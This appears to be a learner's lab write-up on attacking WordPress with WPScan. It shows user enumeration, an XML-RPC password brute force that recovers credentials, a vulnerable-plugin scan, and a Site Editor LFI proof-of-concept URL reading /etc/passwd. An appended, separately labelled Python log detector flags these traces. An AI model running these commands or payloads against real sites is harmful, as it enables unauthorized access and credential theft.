Automattic and WP Engine have a falling-out; WP Engine is barred from accessing WordPress resources
WordPress.org lifts the WP Engine block, temporarily easing the security risk
WordPress is a very widely used site-building tool, but I have actually never used it. My own experience with site-building platforms has been:
phpbb2 --> Moodle --> Drupal
Since it is a site-building tool that so many people use, it is no surprise that there is a scanning tool dedicated to attacking it!
If you haven't opened it for a long time, an update notice appears first.
┌──(kali㉿kali)-[~]
└─$ wpscan --url 172.16.x.x -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
--url specifies the target IP address to scan.
-e: this parameter enables the different types of enumeration.
vp: tries to identify plugins that may have vulnerabilities (Vulnerable Plugins).
ap: enumerates all plugins.
at: enumerates all themes.
u: enumerates all users.
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.16.x.x/xmlrpc.php
[+] WordPress readme found: http://172.16.x.x/readme.html
[+] WordPress version 5.2.12 identified (Insecure, released on 2021-09-09).
[+] twentynineteen
| [!] The version is out of date, the latest version is 2.9
[+] twentyseventeen
| [!] The version is out of date, the latest version is 3.7
[i] User(s) Identified:
[+] alvin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jason
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] john
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] james
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Looking for 0-day vulnerabilities based on the version number
[+] WordPress version 5.2.12
┌──(kali㉿kali)-[~]
└─$ wpscan --url 172.16.x.x -U 'alvin,jason,john,james,tom' -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
[+] URL: http://172.16.x.x/ [172.16.x.x]
[+] Started: Tue Oct 1 04:05:09 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.2.12 identified (Insecure, released on 2021-09-09).
| Found By: Emoji Settings (Passive Detection)
| - http://172.16.x.x/, Match: '-release.min.js?ver=5.2.12'
| Confirmed By: Meta Generator (Passive Detection)
| - http://172.16.x.x/, Match: 'WordPress 5.2.12'
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - john / iloveyou
[SUCCESS] - alvin / apollo
Trying jason / pic Time: 00:12:13 <> (33085 / 500499) 6.61% ETA: 02:52:49s Time: 00:12:13 <> (330^Cying jason / 21041988 Time: 00:14:18 <= > (39235 / 500499) 7.83% ETA: 02:48:07
[!] Valid Combinations Found:
| Username: john, Password: iloveyou
| Username: alvin, Password: apollo
Add the accounts found earlier so no time is wasted: -U 'alvin,jason,john,james,tom'
Use a wordlist to guess the passwords: -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
Two parameters are used here, and the wordlist is the part I have never quite figured out. If you look closely, you can see that I had actually guessed two passwords after 14 minutes and then stopped it myself, because it could run through all 100,000 passwords and still not find anything. The 100,000 passwords are the key point: if a password isn't in the wordlist, it won't be found. I actually went and asked the instructor, and the most critical thing here is still how to build your own wordlist! It's just like how we built our own SOP earlier, so I find it very hard to get the hang of! After all, who still uses a password like 1qaz@WSX that everyone uses? Social engineering would be more efficient.
If 100,000 passwords are hard to picture, or if you have doubts about whether your own password has been leaked, nearly 500 million records leaked over the past several years have been collected into a website where you can check whether your password has already been leaked.
"Have I been pwned?"
If your password really has been hit, here are some suggestions to refer to:
The previous example didn't actually find any plugin vulnerabilities, so here I'll use another WordPress target machine to demonstrate.
┌──(kali㉿kali)-[~]
└─$ wpscan --url 172.16.x.x --api-token '' -e vp
[+] URL: http://172.16.x.x/ [172.16.x.6x]
[+] Started: Tue Oct 1 18:20:33 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.18.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://172.16.x.x/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[i] Plugin(s) Identified:
[+] site-editor
| Location: http://172.16.x.x/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - https://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.16.x.x/wp-content/plugins/site-editor/readme.txt
Here I deleted all the results I didn't need. At the time I seriously went and looked for an exploit for every single result and tried each one, which really takes a lot of enthusiasm and patience. The plugin vulnerability I found useful myself was site-editor Version: 1.1.1; see WordPress Plugin Site Editor 1.1.1 - Local File Inclusion.
** Proof of Concept **
http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
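As an added defender-side example (not from the post and not part of WPScan), the following Python parses constructed Apache access-log lines and flags the three traces the runs above leave in a web server's log: the author-id user enumeration, the XML-RPC password attack, and the Site Editor ajax_path request. The log lines, the source IPs and the two thresholds are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs
# Constructed Apache combined-format access log lines (not from the post). They mimic what the
# wpscan runs above leave behind: ?author=N enumeration, xmlrpc.php POSTs, the ajax_path request.
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Oct/2024:04:05:1{i} +0000] "GET /?author={i} HTTP/1.1" 301 0 "-" "WPScan v3.8.25"'
    for i in range(1, 6)
] + [
    '10.0.0.5 - - [01/Oct/2024:04:06:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WPScan v3.8.25"'
] * 30 + [
    '10.0.0.9 - - [01/Oct/2024:18:21:00 +0000] "GET /wp-content/plugins/site-editor/editor/'
    'extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" '
    '200 1800 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [01/Oct/2024:18:25:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def parse_line(line):
    # Returns (ip, method, path, query_dict, status, user_agent), or None if the line is unparseable.
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, url, status, ua = m.groups()
    parts = urlsplit(url)
    return ip, method, parts.path, parse_qs(parts.query), int(status), ua

def detect(lines, author_threshold=3, xmlrpc_threshold=20):
    """Return sorted (ip, finding) pairs; the thresholds are assumed tuning values."""
    authors = defaultdict(set)       # ip -> distinct ?author= ids requested
    xmlrpc_posts = defaultdict(int)  # ip -> number of POST /xmlrpc.php
    findings = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, query, _status, _ua = rec
        if path == "/" and "author" in query:
            authors[ip].update(query["author"])
        if method == "POST" and path == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
        # Site Editor ajax endpoint asked for a path outside the plugin: the CVE-2018-7422 pattern.
        if path.endswith("/ajax_shortcode_pattern.php") and "ajax_path" in query:
            target = query["ajax_path"][0]
            if target.startswith("/") or ".." in target:
                findings.add((ip, f"site-editor LFI attempt: ajax_path={target}"))
    findings |= {(ip, f"author-id enumeration ({len(ids)} ids)")
                 for ip, ids in authors.items() if len(ids) >= author_threshold}
    findings |= {(ip, f"xmlrpc.php password attack ({n} POSTs)")
                 for ip, n in xmlrpc_posts.items() if n >= xmlrpc_threshold}
    return sorted(findings)
```

On a real server you would feed `detect()` the lines of the access log instead of SAMPLE_LOG; disabling xmlrpc.php and updating or removing the Site Editor plugin removes the two attack surfaces the scan used.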